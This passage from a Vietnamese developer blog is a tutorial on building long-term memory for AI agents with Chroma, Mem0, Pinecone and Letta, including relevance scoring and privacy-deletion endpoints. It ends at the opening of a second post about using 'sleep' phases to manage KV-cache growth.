rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Ưu điểm</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Nhược điểm</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Phù hợp</th></tr></thead><tbody style="box-sizing: border-box;"><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Chroma</strong></td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Lightweight, local, zero setup, free</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Không scale tốt</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Prototype, dev local</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Pinecone</strong></td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Cloud managed, scale cao, latency thấp, API đơn giản</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Tốn tiền ở scale lớn</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Production apps</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Weaviate</strong></td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Open-source, self-hosted, GraphQL API, hybrid search</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Setup phức tạp hơn</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Enterprise, tự host</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Qdrant</strong></td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Open-source, Rust performance, filter mạnh</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Ecosystem nhỏ hơn</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Performance-critical</td></tr></tbody></table><!--kg-card-end: html--><p><strong>Implement với Chroma (nhanh nhất để bắt đầu):</strong></p><pre><code class="language-python"># episodic_memory.py
import chromadb
from datetime import datetime
from openai import OpenAI

# Chroma client — local, không cần server
chroma_client = chromadb.Client()
collection = chroma_client.get_or_create_collection(
    name="episodic_memories",
    metadata={"hnsw:space": "cosine"}  # Dùng cosine similarity
)

openai_client = OpenAI()

def get_embedding(text: str) -> list:
    """Tạo embedding từ text dùng OpenAI"""
    response = openai_client.embeddings.create(
        input=text,
        model="text-embedding-3-small"  # 1536 dimensions, rẻ và tốt
    )
    return response.data[0].embedding

def save_episodic_memory(
    user_id: str,
    content: str,
    metadata: dict = None
):
    """Lưu một memory mới vào vector DB"""
    embedding = get_embedding(content)
    memory_id = f"{user_id}_{datetime.now().timestamp()}"
    
    collection.add(
        documents=[content],
        embeddings=[embedding],
        metadatas=[{
            "user_id": user_id,
            "timestamp": datetime.now().isoformat(),
            "topic": metadata.get("topic", "general") if metadata else "general",
            **(metadata or {})
        }],
        ids=[memory_id]
    )
    return memory_id

def search_relevant_memories(
    user_id: str,
    query: str,
    n_results: int = 5
) -> list[str]:
    """Tìm top-N memories liên quan nhất với query"""
    query_embedding = get_embedding(query)
    
    results = collection.query(
        query_embeddings=[query_embedding],
        n_results=n_results,
        where={"user_id": user_id},  # Filter theo user — quan trọng!
        include=["documents", "metadatas", "distances"]
    )
    
    if not results["documents"][0]:
        return []
    
    # Trả về danh sách memories đã sort theo relevance
    memories = []
    for doc, meta, dist in zip(
        results["documents"][0],
        results["metadatas"][0],
        results["distances"][0]
    ):
        memories.append({
            "content": doc,
            "timestamp": meta.get("timestamp"),
            "relevance_score": 1 - dist  # Convert distance → similarity score
        })
    
    return memories

def delete_user_memories(user_id: str):
    """Xóa toàn bộ memories của một user — cho privacy control"""
    results = collection.get(where={"user_id": user_id})
    if results["ids"]:
        collection.delete(ids=results["ids"])
</code></pre><hr><h1 id="6-d-ng-mem0-th-vi-n-memory-all-in-one"><strong>6. Dùng Mem0 — Thư viện memory all-in-one</strong></h1><p>Nếu không muốn tự build từ đầu, <strong>Mem0</strong> là lựa chọn cực hay. Nó wrap cả 3 tiers trên vào một interface đơn giản, cộng thêm conflict resolution và deduplication tự động:</p><pre><code class="language-bash">pip install mem0ai
</code></pre><p><strong>Cấu hình cơ bản với OpenAI + Chroma (local):</strong></p><pre><code class="language-python"># mem0_basic.py
from mem0 import Memory

# Config đơn giản nhất — dùng OpenAI embedding, Chroma local
config = {
    "llm": {
        "provider": "openai",
        "config": {
            "model": "gpt-4o-mini",
            "api_key": "your-openai-api-key"
        }
    },
    "embedder": {
        "provider": "openai",
        "config": {
            "model": "text-embedding-3-small"
        }
    },
    "vector_store": {
        "provider": "chroma",
        "config": {
            "collection_name": "agent_memories",
            "path": "./chroma_db"  # Local storage
        }
    }
}

m = Memory.from_config(config)

# Lưu memories từ conversation
messages = [
    {"role": "user", "content": "Mình đang build một SaaS dùng Next.js và Supabase"},
    {"role": "assistant", "content": "Hay đó! Bạn đang dùng App Router hay Pages Router?"},
    {"role": "user", "content": "App Router, và mình thích Server Components hơn"},
]
result = m.add(messages, user_id="user_123")
print(result)
# → {'results': [{'memory': 'User đang build SaaS với Next.js App Router + Supabase, thích Server Components', 'event': 'ADD'}]}
# Mem0 tự extract insight từ conversation — không cần bạn làm thủ công!

# Search memories liên quan
relevant = m.search(query="Next.js setup và deployment", user_id="user_123")
for mem in relevant["results"]:
    print(f"Memory: {mem['memory']}")
    print(f"Score: {mem['score']:.3f}")
# → Memory: User đang build SaaS với Next.js App Router + Supabase, thích Server Components
# → Score: 0.892
</code></pre><p><strong>Config production với Pinecone:</strong></p><pre><code class="language-python"># mem0_production.py
from mem0 import Memory

config = {
    "llm": {
        "provider": "openai",
        "config": {
            "model": "gpt-4o-mini",
            "api_key": "your-openai-api-key"
        }
    },
    "embedder": {
        "provider": "openai",
        "config": {
            "model": "text-embedding-3-small"
        }
    },
    "vector_store": {
        "provider": "pinecone",
        "config": {
            "api_key": "your-pinecone-api-key",
            "index_name": "agent-memory-prod",
            "dimension": 1536,
            "metric": "cosine",
            "spec": {
                "serverless": {
                    "cloud": "aws",
                    "region": "us-east-1"
                }
            }
        }
    },
    # Thêm graph store nếu muốn relationship-based memory
    "graph_store": {
        "provider": "neo4j",
        "config": {
            "url": "bolt://localhost:7687",
            "username": "neo4j",
            "password": "your-password"
        }
    }
}

m = Memory.from_config(config)
</code></pre><p><strong>Các operations quan trọng của Mem0:</strong></p><pre><code class="language-python"># Thêm memory
m.add(messages, user_id="user_123")

# Search
results = m.search("deployment setup", user_id="user_123", limit=5)

# Xem tất cả memories của user
all_memories = m.get_all(user_id="user_123")

# Update một memory cụ thể
m.update(memory_id="abc123", data="User đã chuyển sang PlanetScale thay Supabase")

# Xóa một memory
m.delete(memory_id="abc123")

# Xóa toàn bộ memories của user (quan trọng cho privacy!)
m.delete_all(user_id="user_123")

# Memory history — xem quá trình thay đổi của một memory
history = m.history(memory_id="abc123")
</code></pre><hr><h1 id="7-t-ch-h-p-v-o-agent-pipeline-ho-n-ch-nh"><strong>7. Tích hợp vào Agent pipeline hoàn chỉnh</strong></h1><p>Giờ ghép tất cả lại thành một agent thực sự có memory:</p><pre><code class="language-python"># memory_agent.py
from mem0 import Memory
from openai import OpenAI
from user_profile import get_user_profile, update_user_profile

# Initialize
mem0 = Memory.from_config(config)  # Config từ phần trên
openai_client = OpenAI()

# Short-term: giữ 10 tin nhắn gần nhất
session_history = []
MAX_SESSION_HISTORY = 10

def build_system_prompt(user_id: str, user_query: str) -> str:
    """Build system prompt có đầy đủ memory context"""
    
    # 1. Lấy user profile
    profile = get_user_profile(user_id)
    profile_text = ""
    if profile:
        prefs = profile.get("preferences", {})
        facts = profile.get("facts", {})
        profile_text = f"""
Thông tin về user:
- Role: {facts.get('role', 'Unknown')}
- Tech stack: {prefs.get('programming_language', 'Unknown')} / {prefs.get('framework', 'Unknown')}
- Project: {facts.get('project', 'Unknown')}
- Response style: {prefs.get('response_style', 'balanced')}
"""
    
    # 2. Search episodic memories liên quan đến query hiện tại
    relevant_memories = mem0.search(
        query=user_query,
        user_id=user_id,
        limit=5  # Chỉ lấy top-5 để tránh context overload
    )
    
    memories_text = ""
    if relevant_memories["results"]:
        memories_text = "\nNhững gì bạn biết về user từ các cuộc hội thoại trước:\n"
        for mem in relevant_memories["results"]:
            score = mem.get("score", 0)
            if score > 0.7:  # Chỉ lấy memories đủ relevant
                memories_text += f"- {mem['memory']}\n"
    
    system_prompt = f"""Bạn là một AI assistant thông minh và luôn nhớ context về user.
{profile_text}
{memories_text}
Hãy sử dụng context trên để trả lời một cách cá nhân hóa và nhất quán.
Đừng hỏi lại những thông tin bạn đã biết về user.
"""
    return system_prompt

def chat_with_memory(user_id: str, user_message: str) -> str:
    """Main chat function với full memory support"""
    
    # 1. Thêm user message vào session history
    session_history.append({"role": "user", "content": user_message})
    if len(session_history) > MAX_SESSION_HISTORY:
        session_history.pop(0)
    
    # 2. Build system prompt với memories
    system_prompt = build_system_prompt(user_id, user_message)
    
    # 3. Gọi LLM với full context
    messages = [{"role": "system", "content": system_prompt}] + session_history
    
    response = openai_client.chat.completions.create(
        model="gpt-4o",
        messages=messages,
        temperature=0.7
    )
    assistant_response = response.choices[0].message.content
    
    # 4. Thêm response vào session history
    session_history.append({"role": "assistant", "content": assistant_response})
    if len(session_history) > MAX_SESSION_HISTORY:
        session_history.pop(0)
    
    # 5. Lưu cặp conversation vào long-term memory (async tốt hơn)
    mem0.add(
        messages=[
            {"role": "user", "content": user_message},
            {"role": "assistant", "content": assistant_response}
        ],
        user_id=user_id
    )
    
    # 6. Extract và update profile nếu có info mới
    _auto_update_profile(user_id, user_message)
    
    return assistant_response

def _auto_update_profile(user_id: str, user_message: str):
    """Tự động detect và update profile từ message"""
    # Simple heuristics — production cần dùng LLM để extract
    message_lower = user_message.lower()
    
    updates = {}
    if "typescript" in message_lower or " ts " in message_lower:
        updates["programming_language"] = "TypeScript"
    if "next.js" in message_lower or "nextjs" in message_lower:
        updates["framework"] = "Next.js"
    if "react" in message_lower and "native" not in message_lower:
        updates["framework"] = "React"
    
    if updates:
        current = get_user_profile(user_id)
        prefs = current.get("preferences", {})
        prefs.update(updates)
        update_user_profile(user_id, {"preferences": prefs})


# ============================================================
# Demo sử dụng
# ============================================================

if __name__ == "__main__":
    user_id = "user_123"
    
    # Lần 1: Giới thiệu về dự án
    response1 = chat_with_memory(
        user_id,
        "Mình đang build một app HR management với Next.js 14 và Supabase"
    )
    print("Response 1:", response1[:200])
    
    # Lần 2: Câu hỏi về auth (agent sẽ nhớ context từ lần 1)
    response2 = chat_with_memory(
        user_id,
        "Cách tốt nhất để implement authentication là gì?"
    )
    print("Response 2:", response2[:200])
    # Agent biết bạn dùng Next.js + Supabase → recommend Supabase Auth, không phải generic answer
    
    print("\n--- Memories được lưu: ---")
    all_mems = mem0.get_all(user_id=user_id)
    for mem in all_mems["results"]:
        print(f"  • {mem['memory']}")
</code></pre><hr><h1 id="8-recency-relevance-scoring-b-quy-t-ch-n-ng-memory"><strong>8. Recency + Relevance Scoring — Bí quyết chọn đúng memory</strong></h1><p>Không phải memory nào cũng quan trọng như nhau. Memory từ tuần trước về cùng topic thì relevant hơn memory từ 6 tháng trước về topic khác. Cần kết hợp <strong>semantic similarity</strong> và <strong>recency decay</strong>:</p><pre><code class="language-python"># memory_scorer.py
import math
from datetime import datetime, timezone

def compute_recency_weight(
    memory_timestamp: str,
    decay_rate: float = 0.1
) -> float:
    """
    Tính recency weight theo exponential decay.
    Memory càng cũ → weight càng thấp.
    decay_rate: 0.1 ≈ half-life ~7 ngày
    """
    memory_dt = datetime.fromisoformat(memory_timestamp)
    if memory_dt.tzinfo is None:
        memory_dt = memory_dt.replace(tzinfo=timezone.utc)
    
    now = datetime.now(timezone.utc)
    days_ago = (now - memory_dt).total_seconds() / 86400  # Convert to days
    
    return math.exp(-decay_rate * days_ago)

def score_and_rank_memories(
    memories: list[dict],
    semantic_weight: float = 0.7,
    recency_weight: float = 0.3
) -> list[dict]:
    """
    Rank memories dựa trên kết hợp:
    - Semantic similarity score (từ vector search)
    - Recency score (decay theo thời gian)
    
    semantic_weight + recency_weight = 1.0
    """
    scored = []
    
    for mem in memories:
        semantic_score = mem.get("score", 0.5)  # Score từ vector DB
        recency_score = compute_recency_weight(
            mem.get("timestamp", datetime.now().isoformat())
        )
        
        # Combined score
        final_score = (
            semantic_weight * semantic_score +
            recency_weight * recency_score
        )
        
        scored.append({
            **mem,
            "semantic_score": semantic_score,
            "recency_score": recency_score,
            "final_score": final_score
        })
    
    # Sort by final score descending
    return sorted(scored, key=lambda x: x["final_score"], reverse=True)


# Ví dụ sử dụng
raw_memories = [
    {
        "memory": "Dùng Supabase cho database",
        "score": 0.85,
        "timestamp": "2026-01-15T10:00:00"  # 5 tháng trước — cũ
    },
    {
        "memory": "Vừa chuyển sang PlanetScale",
        "score": 0.70,
        "timestamp": "2026-05-30T14:00:00"  # 1 tuần trước — mới
    },
    {
        "memory": "Thích dùng TypeScript strict mode",
        "score": 0.60,
        "timestamp": "2026-06-01T09:00:00"  # 5 ngày trước
    }
]

ranked = score_and_rank_memories(raw_memories)
for mem in ranked:
    print(f"Score: {mem['final_score']:.3f} | {mem['memory']}")

# Output:
# Score: 0.713 | Vừa chuyển sang PlanetScale  ← Mới + khá relevant → top
# Score: 0.634 | Thích dùng TypeScript strict mode
# Score: 0.622 | Dùng Supabase cho database  ← Cũ, bị đẩy xuống dù semantic score cao
</code></pre><p>Đây là lý do tại sao khi bạn nói <em>"Vừa chuyển từ Supabase sang PlanetScale"</em>, ChatGPT sẽ dùng thông tin mới nhất chứ không tiếp tục nói về Supabase.</p><hr><h1 id="9-privacy-controls-ng-b-qua-ph-n-n-y"><strong>9. Privacy Controls — Đừng bỏ qua phần này</strong></h1><p>Đây là phần mà nhiều dev khi build memory system hay bỏ qua, nhưng lại cực kỳ quan trọng khi đưa lên production. Đặc biệt khi anh em có user thật, dữ liệu thật.</p><figure class="kg-card kg-image-card"></figure><p><strong>API endpoints bắt buộc phải có khi build memory system:</strong></p><pre><code class="language-python"># privacy_controls.py
from fastapi import FastAPI, HTTPException
from mem0 import Memory

app = FastAPI()
m = Memory.from_config(config)

@app.get("/users/{user_id}/memories")
def list_memories(user_id: str):
    """
    [BẮTBUỘC] User xem toàn bộ memories của mình.
    Theo GDPR Article 15: "right to access"
    """
    memories = m.get_all(user_id=user_id)
    return {
        "user_id": user_id,
        "total_count": len(memories["results"]),
        "memories": [
            {
                "id": mem["id"],
                "content": mem["memory"],
                "created_at": mem.get("created_at"),
                "updated_at": mem.get("updated_at")
            }
            for mem in memories["results"]
        ]
    }

@app.delete("/users/{user_id}/memories/{memory_id}")
def delete_memory(user_id: str, memory_id: str):
    """
    [BẮTBUỘC] Xóa một memory cụ thể.
    Theo GDPR Article 17: "right to be forgotten"
    """
    # Verify memory belongs to this user trước khi xóa
    all_mems = m.get_all(user_id=user_id)
    memory_ids = [mem["id"] for mem in all_mems["results"]]
    
    if memory_id not in memory_ids:
        raise HTTPException(404, "Memory not found for this user")
    
    m.delete(memory_id=memory_id)
    return {"message": f"Memory {memory_id} deleted successfully"}

@app.delete("/users/{user_id}/memories")
def delete_all_memories(user_id: str):
    """
    [BẮTBUỘC] Xóa toàn bộ memories — "Reset memory"
    Cực kỳ quan trọng cho privacy compliance
    """
    m.delete_all(user_id=user_id)
    return {"message": f"All memories for user {user_id} deleted"}

@app.post("/chat/temporary")
def chat_temporary(message: str):
    """
    [NÊN CÓ] Chat không lưu bất kỳ thứ gì — Temporary/Incognito mode
    User dùng khi không muốn AI ghi nhớ conversation này
    """
    response = openai_client.chat.completions.create(
        model="gpt-4o",
        messages=[{"role": "user", "content": message}]
        # KHÔNG gọi m.add() ở đây
        # KHÔNG lưu vào session history
    )
    return {"response": response.choices[0].message.content}
</code></pre><p><strong>Data Minimization — Những thứ KHÔNG được lưu:</strong></p><pre><code class="language-python"># data_sanitizer.py
import re

SENSITIVE_PATTERNS = [
    r'\b\d{3}-\d{2}-\d{4}\b',          # SSN (US)
    r'\b\d{9,12}\b',                      # CMND/CCCD
    r'\b(?:\d{4}[\s-]?){3}\d{4}\b',     # Credit card
    r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',  # Email
    r'\b(?:\+84|0)\d{9,10}\b',           # Số điện thoại VN
]

def sanitize_before_storing(text: str) -> str:
    """
    Xóa thông tin nhạy cảm trước khi lưu vào memory.
    Luôn chạy function này trước khi gọi m.add()
    """
    for pattern in SENSITIVE_PATTERNS:
        text = re.sub(pattern, "[REDACTED]", text)
    return text

# Sử dụng
safe_content = sanitize_before_storing(user_message)
m.add([{"role": "user", "content": safe_content}], user_id=user_id)
</code></pre><hr><h1 id="10-memgpt-letta-khi-b-n-mu-n-i-s-u-h-n-n-a"><strong>10. MemGPT / Letta — Khi bạn muốn đi sâu hơn nữa</strong></h1><p>Đây là phần bonus cho anh em muốn hiểu kiến trúc memory phức tạp hơn.</p><p><strong>MemGPT</strong> (nay là <strong>Letta</strong>) là một kiến trúc khác hẳn. Thay vì memory được inject vào prompt từ bên ngoài, Letta cho phép <strong>LLM tự quyết định</strong> khi nào cần đọc/ghi memory.</p><p>Hình dung thế này:</p><blockquote>Nếu hệ thống memory thông thường giống như y tá chuẩn bị hồ sơ sẵn cho bác sĩ, thì MemGPT giống như bác sĩ có quyền <strong>tự mở ngăn kéo hồ sơ bất cứ lúc nào</strong> trong quá trình khám — tự quyết định khi nào cần tra cứu thêm thông tin cũ.</blockquote><pre><code class="language-python"># Letta client cơ bản
from letta import create_client

client = create_client()

# Tạo agent với memory capabilities
agent = client.create_agent(
    name="memory_agent",
    memory_blocks=[
        {
            "label": "human",  # Memories về user
            "value": "User là một Backend Developer đang build HR SaaS",
            "limit": 2000  # Char limit cho memory block này
        },
        {
            "label": "persona",  # Personality của agent
            "value": "Tôi là một AI assistant thông minh, luôn nhớ context",
            "limit": 1000
        }
    ],
    tools=["archival_memory_insert", "archival_memory_search"]
    # Agent có thể tự gọi tools này để đọc/ghi long-term memory
)

# Chat với agent — nó tự manage memory
response = client.send_message(
    agent_id=agent.id,
    message="Cách tốt nhất để optimize Postgres queries là gì?",
    role="user"
)
print(response.messages[-1].text)
</code></pre><p><strong>Điểm khác biệt then chốt của MemGPT:</strong></p><ul><li><strong>OS-inspired paging</strong>: LLM có "main context" (như RAM) và "archival storage" (như disk). Khi main context đầy, LLM tự quyết định gì cần "swap out" vào archival</li><li><strong>Self-directed retrieval</strong>: LLM chủ động search archival memory khi cần, không phải hệ thống tự inject</li><li><strong>Function calling</strong>: Dùng tool calls để đọc/ghi memory, tạo vòng lặp suy nghĩ phức tạp hơn</li></ul><p>Letta phù hợp cho use cases cần <strong>long-horizon reasoning</strong> — agent phải nhớ và liên kết thông tin từ rất nhiều sessions khác nhau.</p><hr><h1 id="11-b-i-h-c-kinh-nghi-m"><strong>11. Bài học kinh nghiệm</strong></h1><p><strong>BÀI HỌC KINH NGHIỆM:</strong></p><p>Mình đã thử build memory system cho một internal chatbot của team và học được khá nhiều thứ theo cách... đau nhất.</p><p><strong>Bài học 1: Context Window Budget — Đừng tham lam</strong></p><p>Lần đầu build, mình nhét hết toàn bộ memories liên quan vào prompt. Kết quả: model bị context overload, response chất lượng giảm rõ rệt, thậm chí hallucinate khi phải "đọc" quá nhiều thứ cùng lúc.</p><p>Giải pháp: <strong>Hard limit ở 5–7 memories tối đa</strong>, kết hợp với relevance threshold (chỉ lấy memories có score > 0.7). Kém quantity nhưng quality tốt hơn rất nhiều.</p><p><strong>Bài học 2: Conflict Resolution là mandatory, không phải optional</strong></p><p>User thay đổi tech stack, đổi job, đổi project — những thứ này xảy ra thường xuyên hơn mình nghĩ. Nếu không có conflict resolution, agent sẽ nói những thứ mâu thuẫn nhau và mất đi sự tin tưởng của user.</p><p>Giải pháp: Dùng Mem0 (nó handle deduplication và conflict tốt hơn tự build từ đầu), hoặc nếu tự build thì implement "supersede" mechanism — khi có memory mới về cùng topic, mark memory cũ là deprecated.</p><p><strong>Bài học 3: Lưu quá nhiều ≠ Nhớ tốt hơn</strong></p><p>Lúc đầu mình lưu tất cả mọi thứ — kể cả những câu hỏi casual, những conversation không có giá trị. Kết quả: vector DB đầy toàn "rác", retrieval quality giảm vì nhiều irrelevant results.</p><p>Giải pháp: Implement <strong>memory worthiness filter</strong> — trước khi save, check xem memory này có đủ giá trị để lưu lâu dài không. Simple heuristic: chỉ lưu thông tin về preferences, facts, decisions — không lưu small talk.</p><pre><code class="language-python">def is_worth_storing(content: str) -> bool:
    """
    Heuristic đơn giản để filter trước khi lưu.
    Production nên dùng LLM để classify chính xác hơn.
    """
    # Quá ngắn → probably không có value
    if len(content.split()) < 5:
        return False
    
    # Các indicator của valuable memory
    valuable_keywords = [
        "đang dùng", "thích", "không thích", "prefer", "đang build",
        "project", "stack", "framework", "database", "deploy", "team",
        "requirement", "constraint", "goal", "objective"
    ]
    
    content_lower = content.lower()
    keyword_count = sum(1 for kw in valuable_keywords if kw in content_lower)
    
    return keyword_count >= 1  # Ít nhất 1 keyword có giá trị
</code></pre><p><strong>Bài học 4: Privacy phải là first-class citizen</strong></p><p>Khi add user thật vào test, mình mới realize là chưa có cơ chế nào để user xóa memories. Phải refactor lại khá nhiều. Từ bây giờ mình luôn design privacy controls <strong>trước khi</strong> code feature memory.</p><hr><h1 id="k-t-lu-n"><strong>Kết luận</strong></h1><p>Tóm gọn lại những gì mình đã đi qua:</p><ul><li>ChatGPT "nhớ" bằng cách nhét memory context vào system prompt trước mỗi request — không phải bộ nhớ thật sự, nhưng hiệu quả tương đương</li><li>Có <strong>4 loại memory</strong> khác nhau với lifecycle và storage riêng: Profile, Episodic, Extracted Knowledge, và Active Context</li><li><strong>Kiến trúc 4 lớp</strong>: UI → Processing Engine → Storage → LLM Integration</li><li>Build memory system không khó: bắt đầu với <strong>Chroma + Mem0</strong> cho prototype, scale lên <strong>Pinecone</strong> cho production</li><li><strong>Recency + relevance scoring</strong> là bí quyết để chọn đúng memory cần đưa vào context</li><li><strong>Privacy controls</strong> là bắt buộc, không phải optional — visibility, deletion, temporary mode</li><li><strong>MemGPT/Letta</strong> nếu muốn đi sâu vào self-directed memory management</li></ul><p>Nếu anh em đang build AI agent và muốn nó "thông minh hơn" theo thời gian, nhớ người dùng như một người bạn thực sự — memory system chính là missing piece.</p><p><strong>Nguồn tham khảo:</strong></p><ul><li><a href="https://agentman.ai/blog/reverse-ngineering-latest-ChatGPT-memory-feature-and-building-your-own">Agentman: Reverse Engineering ChatGPT Memory</a></li><li><a href="https://embracethered.com/blog/posts/2025/chatgpt-how-does-chat-history-memory-preferences-work/">How ChatGPT Memory Works — Embrace The Red</a></li><li><a href="https://docs.mem0.ai/">Mem0 Official Documentation</a></li><li><a href="https://help.openai.com/en/articles/8590148-memory-faq">OpenAI Memory FAQ</a></li><li><a href="https://sparkco.ai/blog/pinecone-vs-weaviate-vs-chroma-a-deep-dive-into-vector-dbs">Pinecone vs Weaviate vs Chroma Deep Dive</a></li><li><a href="https://docs.letta.com/">Letta (MemGPT) Documentation</a></li><li><a href="https://docs.trychroma.com/">ChromaDB Documentation</a></li></ul>
</article>
<article>
<h1>Nghịch Lý Của Cỗ Máy 24/7: Khi "Giấc Ngủ" Liệu Có Giúp AI Thông Minh Hơn?</h1>
<p>Nguyen Trung duc — Wed, 24 Jun 2026 12:32:18 GMT</p>
<p></p><p>Xin chào anh em,</p><p>Một trong những lý do lớn nhất khiến thế giới dịch chuyển sang sử dụng Trí tuệ nhân tạo (AI) chính là khả năng vận hành vô hạn. Trong khi con người chỉ có thể làm việc hiệu quả từ 8 đến 10 tiếng mỗi ngày và bắt buộc phải dành 1/3 cuộc đời để ngủ nhằm tái tạo năng lượng, thì AI có thể hoạt động liên tục 24/7 không một phút nghỉ ngơi. Chúng ta mặc định rằng máy móc thì không biết mệt mỏi, và việc ép chúng xử lý hàng triệu dòng lệnh liên tục là điều hiển nhiên.</p><p>Nhưng dưới góc độ kỹ thuật, đã bao giờ bạn tự hỏi: <strong>"Liệu một mô hình ngôn ngữ lớn có cần đi ngủ hay không? Và nếu cho nó nghỉ ngơi, hiệu suất làm việc của nó có thực sự tốt hơn?"</strong></p><p>Câu hỏi nghe có vẻ mang tính khá hài hước này thực chất có lẽ lại là lời giải cho một bài toán hóc búa nhất của ngành công nghiệp AI hiện nay: X<strong>ử lý ngữ cảnh siêu dài (Long-Context)</strong>. AI không mệt mỏi về mặt sinh học, nhưng chúng đang "kiệt quệ" về mặt tài nguyên phần cứng. Hôm nay, tôi sẽ cùng anh em tìm hiểu một tư duy kiến trúc cực kỳ dị: Cho AI "đi ngủ" để cứu vãn thanh RAM đang quá tải của anh em ta.</p><h2 id="1-b-n-ch-t-k-thu-t-t-i-sao-ai-c-ng-c-y-l-u-c-ng-ki-t-s-c">1. Bản chất kỹ thuật – Tại sao AI càng cày lâu càng... "kiệt sức"?</h2><p>Để hiểu tại sao AI bị "ngáo" khi chat dài, chúng ta phải lột trần cái "tử huyệt" nằm sâu trong kiến trúc Transformer: <strong>KV Cache (Bộ nhớ đệm Key-Value)</strong>.</p><p>Anh em cứ tưởng tượng KV Cache nó giống như <strong>cuốn sổ tay ghi nhớ</strong> của Claude. Khi anh em bắt nó đọc cả một codebase hoặc file log hệ thống dài dằng dặc, nó phải ghi lại chính xác từng từ vào cuốn sổ này để đảm bảo câu trả lời tiếp theo không bị lạc đề. Đối với dân dev, cái cơ chế lưu trữ "cố chấp" này gây ra hai quả tạ cực nặng cho hệ thống:</p><ul><li><strong>VRAM phình to kinh hoàng:</strong> Càng nạp nhiều token mới, "cuốn sổ" KV Cache càng dày lên. Khi xử lý các văn bản siêu dài, dung lượng bộ nhớ đệm này tăng tiến một cách khủng khiếp, thậm chí vượt xa kích thước trọng số gốc của chính mô hình. Điều đó dẫn đến cái lỗi ám ảnh mọi thời đại: <strong>Out of Memory (OOM)</strong> sập nguồn GPU!</li><li><strong>Độ trễ tăng theo hàm bình phương ($O(n^2)$): </strong> Vì cơ chế Attention bắt buộc mô hình phải quét lại toàn bộ dữ liệu trong quá khứ để xử lý từ hiện tại. Chuỗi bối cảnh càng dài, khối lượng tính toán càng nặng. Đó là lý do tại sao ban đầu AI phản hồi rất nhanh, nhưng sau một thời gian hội thoại thì càng ngày càng đuối .</li></ul><p>Từ trước đến nay, anh em ta toàn giải quyết vấn đề này bằng những biện pháp tạm thời theo kiểu như: </p><ul><li>Nâng cấp hạ tầng phần cứng (Đốt tiền mua thêm GPU).</li><li>Cắt bỏ bớt ngữ cảnh cũ (Truncation) $\rightarrow$ Chấp nhận AI bị "mất trí nhớ ngắn hạn".</li><li>Dùng cửa sổ trượt (Sliding Window).</li></ul><p>Nhưng tất cả đều không giải quyết được gốc rễ bài toán đòi hỏi tính nhất quán cao. Tình trạng này giống hệt việc anh em cố duy trì mở 500 tab Chrome cùng lúc để làm việc; hệ thống chắc chắn sẽ nghẽn mạch và tràn RAM.</p><p>Từ đây, một tư duy kiến trúc hoàn toàn mới được đặt ra: <strong>Thay vì cố giữ 500 cái tab đó hoạt động và làm tràn RAM, tại sao không cho hệ thống tạm thời tắt, nhưng đóng gói và nén thông tin cốt lõi vào một dạng bộ nhớ bền vững hơn?</strong></p><p> Đó chính là lúc chúng ta bảo AI: <strong>"Thôi đi ngủ đi em!"</strong></p><h2 id="2-c-ch-ng-chuy-n-h-a-k-c-ng-n-h-n-th-nh-tr-ng-s-ph-n-ng-nhanh">2. Cơ chế "Ngủ" – Chuyển hóa ký ức ngắn hạn thành "Trọng số phản ứng nhanh"</h2><p>Để giải quyết bài toán nghẽn cổ chai này, các kỹ sư hệ thống đã copy y nguyên cơ chế sinh học của não người: <strong>Hợp nhất bộ nhớ (Memory Consolidation)</strong>. Khi anh em ta ngủ, não bộ sẽ chuyển dịch các ký ức ngắn hạn từ vùng Hải mã (Hippocampus) sang vùng Vỏ não (Neocortex) để lưu trữ dài hạn. </p><p>Theo các đề xuất kiến trúc đang được nghiên cứu thử nghiệm, chu kỳ hoạt động của AI được tách đôi thành hai trạng thái: <strong>Thức</strong> và <strong>Ngủ</strong>.</p><pre><code>     ☀️ TRẠNG THÁI THỨC (Online Phase)
 └── Chat với User
 └── KV Cache siêu tối giản (Chỉ nhớ vài câu thoại gần nhất)
 └── Tốc độ nhả chữ nhanh, duy trì ở mức hằng số
       │
       ▼ (Khi hệ thống rơi vào trạng thái nhàn rỗi - Idle)
       │
 💤 TRẠNG THÁI NGỦ (Offline Phase)
 └── Lôi KV Cache cũ ra "tiêu hóa" ngầm bằng Gradient Descent
 └── Ép thông tin "hóa thạch" vào ma trận Fast Weights
